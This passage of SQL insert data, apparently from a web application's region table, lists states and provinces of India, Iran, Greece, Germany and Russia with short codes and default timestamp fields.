00:00:00',0),(420,1,99,0,'Haryana','HAR','HA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(421,1,99,0,'Himachal Pradesh','HIM','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(422,1,99,0,'Jammu & Kashmir','JAM','JA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(423,1,99,0,'Jharkhand','JHA','JH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(424,1,99,0,'Karnataka','KAR','KA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(425,1,99,0,'Kerala','KER','KE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(426,1,99,0,'Lakshadweep','LAK','LA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(427,1,99,0,'Madhya Pradesh','MAD','MD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(428,1,99,0,'Maharashtra','MAH','MH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(429,1,99,0,'Manipur','MAN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(430,1,99,0,'Meghalaya','MEG','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(431,1,99,0,'Mizoram','MIZ','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(432,1,99,0,'Nagaland','NAG','NA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(433,1,99,0,'Orissa','ORI','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(434,1,99,0,'Pondicherry','PON','PO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(435,1,99,0,'Punjab','PUN','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(436,1,99,0,'Rajasthan','RAJ','RA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(437,1,99,0,'Sikkim','SIK','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(438,1,99,0,'Tamil Nadu','TAM','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(439,1,99,0,'Tripura','TRI','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(440,1,99,0,'Uttaranchal','UAR','UA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(441,1,99,0,'Uttar Pradesh','UTT','UT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(442,1,99,0,'West Bengal','WES','WE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(443,1,101,0,'Ahmadi va Kohkiluyeh','BOK','BO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(444,1,101,0,'Ardabil','ARD','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(445,1,101,0,'Azarbayjan-e Gharbi','AZG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(446,1,101,0,'Azarbayjan-e Sharqi','AZS','AS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(447,1,101,0,'Bushehr','BUS','BU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(448,1,101,0,'Chaharmahal va Bakhtiari','CMB','CM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(449,1,101,0,'Esfahan','ESF','ES',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(450,1,101,0,'Fars','FAR','FA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(451,1,101,0,'Gilan','GIL','GI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(452,1,101,0,'Gorgan','GOR','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(453,1,101,0,'Hamadan','HAM','HA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(454,1,101,0,'Hormozgan','HOR','HO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(455,1,101,0,'Ilam','ILA','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(456,1,101,0,'Kerman','KER','KE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(457,1,101,0,'Kermanshah','BAK','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(458,1,101,0,'Khorasan-e Junoubi','KHJ','KJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(459,1,101,0,'Khorasan-e Razavi','KHR','KR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(460,1,101,0,'Khorasan-e Shomali','KHS','KS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(461,1,101,0,'Khuzestan','KHU','KH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(462,1,101,0,'Kordestan','KOR','KO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(463,1,101,0,'Lorestan','LOR','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(464,1,101,0,'Markazi','MAR','MR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(465,1,101,0,'Mazandaran','MAZ','MZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(466,1,101,0,'Qazvin','QAS','QA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(467,1,101,0,'Qom','QOM','QO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(468,1,101,0,'Semnan','SEM','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(469,1,101,0,'Sistan va Baluchestan','SBA','SB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(470,1,101,0,'Tehran','TEH','TE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(471,1,101,0,'Yazd','YAZ','YA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(472,1,101,0,'Zanjan','ZAN','ZA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(535,1,84,0,'ΛΕΥΚΑΔΑΣ','ΛΕΥ','ΛΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(532,1,84,0,'ΛΑΡΙΣΑΣ','ΛΑΡ','ΛΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(504,1,84,0,'ΑΡΚΑΔΙΑΣ','ΑΡΚ','ΑΚ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(503,1,84,0,'ΑΡΓΟΛΙΔΑΣ','ΑΡΓ','ΑΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(533,1,84,0,'ΛΑΣΙΘΙΟΥ','ΛΑΣ','ΛΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(534,1,84,0,'ΛΕΣΒΟΥ','ΛΕΣ','ΛΣ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(530,1,84,0,'ΚΥΚΛΑΔΩΝ','ΚΥΚ','ΚΥ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(553,1,84,0,'ΑΙΤΩΛΟΑΚΑΡΝΑΝΙΑΣ','ΑΙΤ','ΑΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(529,1,84,0,'ΚΟΡΙΝΘΙΑΣ','ΚΟΡ','ΚΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(531,1,84,0,'ΛΑΚΩΝΙΑΣ','ΛΑΚ','ΛK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(517,1,84,0,'ΗΜΑΘΙΑΣ','ΗΜΑ','ΗΜ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(518,1,84,0,'ΗΡΑΚΛΕΙΟΥ','ΗΡΑ','ΗΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(519,1,84,0,'ΘΕΣΠΡΩΤΙΑΣ','ΘΕΠ','ΘΠ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(520,1,84,0,'ΘΕΣΣΑΛΟΝΙΚΗΣ','ΘΕΣ','ΘΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(521,1,84,0,'ΙΩΑΝΝΙΝΩΝ','ΙΩΑ','ΙΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(522,1,84,0,'ΚΑΒΑΛΑΣ','ΚΑΒ','ΚΒ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(523,1,84,0,'ΚΑΡΔΙΤΣΑΣ','ΚΑΡ','ΚΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(524,1,84,0,'ΚΑΣΤΟΡΙΑΣ','ΚΑΣ','ΚΣ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(525,1,84,0,'ΚΕΡΚΥΡΑΣ','ΚΕΡ','ΚΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(526,1,84,0,'ΚΕΦΑΛΛΗΝΙΑΣ','ΚΕΦ','ΚΦ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(527,1,84,0,'ΚΙΛΚΙΣ','ΚΙΛ','ΚΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(528,1,84,0,'ΚΟΖΑΝΗΣ','ΚΟΖ','ΚZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(507,1,84,0,'ΑΧΑΪΑΣ','ΑΧΑ','ΑΧ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(508,1,84,0,'ΒΟΙΩΤΙΑΣ','ΒΟΙ','ΒΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(509,1,84,0,'ΓΡΕΒΕΝΩΝ','ΓΡΕ','ΓΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(510,1,84,0,'ΔΡΑΜΑΣ','ΔΡΑ','ΔΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(511,1,84,0,'ΔΩΔΕΚΑΝΗΣΟΥ','ΔΩΔ','ΔΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(512,1,84,0,'ΕΒΡΟΥ','ΕΒΡ','ΕΒ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(513,1,84,0,'ΕΥΒΟΙΑΣ','ΕΥΒ','ΕΥ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(514,1,84,0,'ΕΥΡΥΤΑΝΙΑΣ','ΕΥΡ','ΕΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(515,1,84,0,'ΖΑΚΥΝΘΟΥ','ΖΑΚ','ΖΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(516,1,84,0,'ΗΛΕΙΑΣ','ΗΛΕ','ΗΛ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(505,1,84,0,'ΑΡΤΑΣ','ΑΡΤ','ΑΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(506,1,84,0,'ΑΤΤΙΚΗΣ','ΑΤΤ','ΑΤ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(536,1,84,0,'ΜΑΓΝΗΣΙΑΣ','ΜΑΓ','ΜΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(537,1,84,0,'ΜΕΣΣΗΝΙΑΣ','ΜΕΣ','ΜΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(538,1,84,0,'ΞΑΝΘΗΣ','ΞΑΝ','ΞΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(539,1,84,0,'ΠΕΛΛΗΣ','ΠΕΛ','ΠΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(540,1,84,0,'ΠΙΕΡΙΑΣ','ΠΙΕ','ΠΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(541,1,84,0,'ΠΡΕΒΕΖΑΣ','ΠΡΕ','ΠΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(542,1,84,0,'ΡΕΘΥΜΝΗΣ','ΡΕΘ','ΡΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(543,1,84,0,'ΡΟΔΟΠΗΣ','ΡΟΔ','ΡΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(544,1,84,0,'ΣΑΜΟΥ','ΣΑΜ','ΣΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(545,1,84,0,'ΣΕΡΡΩΝ','ΣΕΡ','ΣΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(546,1,84,0,'ΤΡΙΚΑΛΩΝ','ΤΡΙ','ΤΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(547,1,84,0,'ΦΘΙΩΤΙΔΑΣ','ΦΘΙ','ΦΘ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(548,1,84,0,'ΦΛΩΡΙΝΑΣ','ΦΛΩ','ΦΛ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(549,1,84,0,'ΦΩΚΙΔΑΣ','ΦΩΚ','ΦΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(550,1,84,0,'ΧΑΛΚΙΔΙΚΗΣ','ΧΑΛ','ΧΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(551,1,84,0,'ΧΑΝΙΩΝ','ΧΑΝ','ΧΝ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(552,1,84,0,'ΧΙΟΥ','ΧΙΟ','ΧΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(569,1,81,0,'Schleswig-Holstein','SHO','SH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(554,1,81,0,'Freie und Hansestadt Hamburg','HAM','HH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(555,1,81,0,'Niedersachsen','NIS','NI',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(556,1,81,0,'Freie Hansestadt Bremen','HBR','HB',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(557,1,81,0,'Nordrhein-Westfalen','NRW','NW',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(558,1,81,0,'Hessen','HES','HE',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(559,1,81,0,'Rheinland-Pfalz','RLP','RP',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(560,1,81,0,'Baden-Württemberg','BWÜ','BW',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(561,1,81,0,'Freistaat Bayern','BAV','BY',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(562,1,81,0,'Saarland','SLA','SL',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(563,1,81,0,'Berlin','BER','BE',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(564,1,81,0,'Brandenburg','BRB','BB',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(565,1,81,0,'Mecklenburg-Vorpommern','MVO','MV',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(566,1,81,0,'Freistaat Sachsen','SAC','SN',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(567,1,81,0,'Sachsen-Anhalt','SAA','ST',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(568,1,81,0,'Freistaat Thüringen','THÜ','TH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(570,1,176,0,'Адыгея Республика','AD','01',1,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(571,1,176,0,'Алтай Республика','AL','04',2,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(572,1,176,0,'Алтайский край','ALT','22',3,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(573,1,176,0,'Амурская область','AMU','28',4,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(574,1,176,0,'Архангельская область','ARK','29',5,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(575,1,176,0,'Астраханская область','AST','30',6,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(576,1,176,0,'Башкортостан Республика','BA','02',7,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(577,1,176,0,'Белгородская область','BEL','31',8,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(578,1,176,0,'Брянская область','BRY','32',9,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(579,1,176,0,'Бурятия Республика','BU','03',10,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(580,1,176,0,'Владимирская область','VLA','33',11,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(581,1,176,0,'Волгоградская область','VGG','34',12,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(582,1,176,0,'Вологодская область','VLG','35',13,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(583,1,176,0,'Воронежская область','VOR','36',14,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(584,1,176,0,'Дагестан Республика','DA','05',15,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(585,1,176,0,'Еврейская автономная область','YEV','79',16,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(586,1,176,0,'Забайкальский край','ZAB','75',17,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(587,1,176,0,'Ивановская область','IVA','37',18,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(588,1,176,0,'Ингушетия Республика','IN','06',19,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(589,1,176,0,'Иркутская область','IRK','38',20,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(590,1,176,0,'Кабардино-Балкарская Республика','KB','07',21,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(591,1,176,0,'Калининградская область','KGD','39',22,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(592,1,176,0,'Калмыкия Республика','KL','08',23,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(593,1,176,0,'Калужская область','KLU','40',24,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(594,1,176,0,'Камчатский край','KAM','41',25,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(595,1,176,0,'Карачаево-Черкесская Республика','KC','09',26,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(596,1,176,0,'Карелия Республика','KR','10',27,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(597,1,176,0,'Кемеровская область','KEM','42',28,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(598,1,176,0,'Кировская область','KIR','43',29,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(599,1,176,0,'Коми Республика','KO','11',30,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(600,1,176,0,'Костромская область','KOS','44',31,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(601,1,176,0,'Краснодарский край','KDA','23',32,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(602,1,176,0,'Красноярский край','KIA','24',33,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(603,1,176,0,'Курганская область','KGN','45',34,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(604,1,176,0,'Курская область','KRS','46',35,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(605,1,176,0,'Ленинградская область','LEN','47',36,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(606,1,176,0,'Липецкая область','LIP','48',37,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(607,1,176,0,'Магаданская область','MAG','49',38,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(608,1,176,0,'Марий Эл Республика','ME','12',39,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(609,1,176,0,'Мордовия Республика','MO','13',40,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(610,1,176,0,'Москва','MOW','77',41,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(611,1,176,0,'Московская область','MOS','50',42,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(612,1,176,0,'Мурманская область','MUR','51',43,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(613,1,176,0,'Ненецкий автономный округ','NEN','83',44,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(614,1,176,0,'Нижегородская область','NIZ','52',45,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(615,1,176,0,'Новгородская область','NGR','53',46,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(616,1,176,0,'Новосибирская область','NVS','54',47,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(617,1,176,0,'Омская область','OMS','55',48,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(618,1,176,0,'Оренбургская область','ORE','56',49,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(619,1,176,0,'Орловская область','ORL','57',50,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(620,1,176,0,'Пензенская область','PNZ','58',51,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(621,1,176,0,'Пермский край','PER','59',52,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(622,1,176,0,'Приморский край','PRI','25',53,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(623,1,176,0,'Псковская область','PSK','60',54,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(624,1,176,0,'Ростовская область','ROS','61',55,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(625,1,176,0,'Рязанская область','RYA','62',56,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(626,1,176,0,'Самарская область','SAM','63',57,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(627,1,176,0,'Санкт-Петербург','SPE','78',58,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 